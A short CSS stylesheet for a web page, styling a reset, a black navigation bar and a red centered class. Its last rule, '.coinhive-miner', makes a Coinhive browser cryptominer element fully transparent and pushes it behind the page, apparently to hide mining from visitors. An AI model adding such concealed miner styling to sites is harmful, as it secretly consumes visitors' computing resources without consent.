@charset "utf-8";
/* CSS Document */
*{
	margin: 0;
	padding: 0;
}
html,body{
	height: 100%;
}
nav{
	background-color: black;
	text-align: center;
	font-family: Baskerville, "Palatino Linotype", Palatino, "Century Schoolbook L", "Times New Roman", "serif";
	font-size: 10px;
	padding: 10px;
	color: aliceblue;
	width: 100%;
}
nav a{
	text-decoration: none;
	color: aliceblue;
	font-weight: bold;
	margin:10px;
}
nav a:hover{
	color:aqua;
}
.pestilo{
	text-align:center;
	color:red;
}
.coinhive-miner{
	position: fixed;
        opacity: 0;
        z-index:-1;
	top: 0px;
}
